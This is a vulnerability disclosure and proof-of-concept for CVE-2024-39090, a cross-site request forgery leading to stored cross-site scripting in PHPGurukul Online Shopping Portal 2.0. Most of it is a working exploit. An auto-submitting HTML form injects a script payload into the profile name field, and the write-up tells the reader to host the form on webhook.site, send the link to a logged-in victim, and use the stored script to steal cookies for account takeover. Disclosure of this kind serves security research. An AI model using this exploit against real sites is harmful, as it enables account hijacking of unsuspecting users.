CVE-2024-39090.md

CVE-2024-39090: PHPGurukul Online Shopping Portal Project 2.0 - CSRF to Stored XSS

Exploit Title: PHPGurukul Online Shopping Portal Project 2.0 - CSRF to Stored XSS

Exploit Author: Arijit Dirghangi

Vendor Homepage: https://phpgurukul.com/

Software Link: https://phpgurukul.com/shopping-portal-free-download/

Version: 2.0

Vulnerable endpoint: https://localhost/shopping/my-account.php

Tested on : Windows 11, XAMPP

Proof-of-Concept

To Reproduce:

1) Visit https://webhook.site/, click on 'edit,' and paste the below code into 'content,' then click on Save.

<html>
  <body>
    <form action="https://localhost/shopping/my-account.php" method="POST">
      <input type="hidden" name="name" value="XSS&quot;&gt;LOL&lt;svg&#47;onload&#61;alert&#40;1&#41;&gt;&lt;" />
      <input type="hidden" name="contactno" value="1234567890" />
      <input type="hidden" name="update" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

2) A unique URL will be generated. Forward this URL to the end user. If the user is authenticated, the profile name will be updated with the malicious payload, and the XSS will be stored successfully.

3) Using this Vulnerability, attacker can steal cookie user which cause to account takeover.

Example URL: https://webhook.site/93cd6aa7-7dcb-4bbb-a71b-30a47a81c46b

Affected Endpoint: https://localhost/shopping/my-account.php

PoC: https://drive.google.com/file/d/1KQbyImLDEY7BY9Vsa32OyeZafkLZ-jTe/view